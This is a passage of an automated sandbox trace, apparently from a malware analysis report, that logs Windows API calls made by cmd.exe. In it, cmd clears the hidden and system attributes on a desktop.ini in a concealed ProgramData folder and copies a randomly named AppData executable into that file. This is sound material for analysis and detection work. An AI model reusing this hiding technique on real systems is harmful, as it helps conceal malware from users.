-2 [0147.401] SetErrorMode (uMode=0x0) returned 0x0 [0147.401] SetErrorMode (uMode=0x1) returned 0x0 [0147.401] GetFullPathNameW (in: lpFileName=".", 
nBufferLength=0x208, lpBuffer=0x2a0658, lpFilePart=0x22ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ed8c*="Desktop") returned 0x18 [0147.401] SetErrorMode (uMode=0x0) returned 0x1 [0147.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.402] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.407] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.407] GetLastError () returned 0x2 [0147.407] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.408] GetLastError () returned 0x2 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0x2a0940 [0147.408] FindClose (in: hFindFile=0x2a0940 | out: hFindFile=0x2a0940) returned 1 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb08) returned 0xffffffff [0147.408] GetLastError () returned 0x2 [0147.408] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22eb08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 
| out: lpFindFileData=0x22eb08) returned 0x2a0940 [0147.408] FindClose (in: hFindFile=0x2a0940 | out: hFindFile=0x2a0940) returned 1 [0147.408] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.408] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.408] GetConsoleTitleW (in: lpConsoleTitle=0x22f000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.476] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ee88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef50 | out: lpAttributeList=0x22ee88, lpSize=0x22ef50) returned 1 [0147.476] UpdateProcThreadAttribute (in: lpAttributeList=0x22ee88, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ee88, lpPreviousValue=0x0) returned 1 [0147.476] GetStartupInfoW (in: lpStartupInfo=0x22ee44 | out: lpStartupInfo=0x22ee44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.476] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.477] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eee4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ef30 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessInformation=0x22ef30*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa88, dwThreadId=0xa34)) returned 1 [0147.526] CloseHandle (hObject=0x4c) returned 1 [0147.526] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.526] GetEnvironmentStringsW () returned 0x2a0bd0* [0147.526] FreeEnvironmentStringsW (penv=0x2a0bd0) returned 1 [0147.526] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.672] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ee24 | out: lpExitCode=0x22ee24*=0x0) returned 1 [0147.672] CloseHandle (hObject=0x50) returned 1 [0147.672] _vsnwprintf (in: _Buffer=0x22ef6c, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee30 | out: _Buffer="00000000") returned 8 [0147.672] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.673] GetEnvironmentStringsW () returned 0x2a26d8* [0147.673] FreeEnvironmentStringsW (penv=0x2a26d8) returned 1 [0147.673] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.673] GetEnvironmentStringsW () returned 0x2a26d8* [0147.673] FreeEnvironmentStringsW (penv=0x2a26d8) returned 1 [0147.673] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ee88 | out: lpAttributeList=0x22ee88) [0147.673] GetConsoleTitleW (in: lpConsoleTitle=0x22f208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.673] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e280, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e284, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e280*=0xff, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer="NTFS") returned 1 [0147.673] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0147.674] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0147.674] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini")) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1")) returned 0x10 [0147.674] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0147.674] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0147.674] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini")) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2a3854, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a3854) returned 0xffffffff [0147.674] GetLastError () returned 0x2 [0147.674] _get_osfhandle (_FileHandle=2) returned 0xb [0147.674] GetFileType (hFile=0xb) returned 0x2 [0147.674] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0147.674] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ec80 | out: lpMode=0x22ec80) returned 1 [0147.675] _get_osfhandle (_FileHandle=2) returned 0xb [0147.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ecb4 | out: lpConsoleScreenBufferInfo=0x22ecb4) returned 1 [0147.675] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.675] GetFileType (hFile=0x7) returned 0x2 [0147.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0147.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f3a4 | out: lpMode=0x22f3a4) returned 1 [0147.676] _dup (_FileHandle=1) returned 3 [0147.676] _close (_FileHandle=1) returned 0 [0147.676] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini", _String2="con") returned -53 [0147.676] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f374, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0147.676] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0147.676] GetConsoleTitleW (in: lpConsoleTitle=0x22f1a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x22ed08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ed08) returned 0x29e768 [0147.677] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0147.677] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0147.677] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0147.677] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22dc14, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0147.677] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] GetFileType (hFile=0x58) returned 0x1 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x22dc6c | out: lpFileSizeHigh=0x22dc6c*=0x0) returned 0x7d600 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.677] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.677] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.677] GetFileType (hFile=0x50) returned 0x1 [0147.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.677] GetFileType (hFile=0x50) returned 0x1 [0147.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.678] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) 
returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.679] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.680] 
SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.680] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] GetFileType (hFile=0x50) returned 0x1 [0147.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.680] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | 
out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.681] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] GetFileType (hFile=0x50) returned 0x1 [0147.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.681] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 
[0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.682] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.682] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 
[0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] GetFileType (hFile=0x50) returned 0x1 [0147.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.682] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] GetFileType (hFile=0x50) returned 0x1 [0147.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.683] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.683] _get_osfhandle 
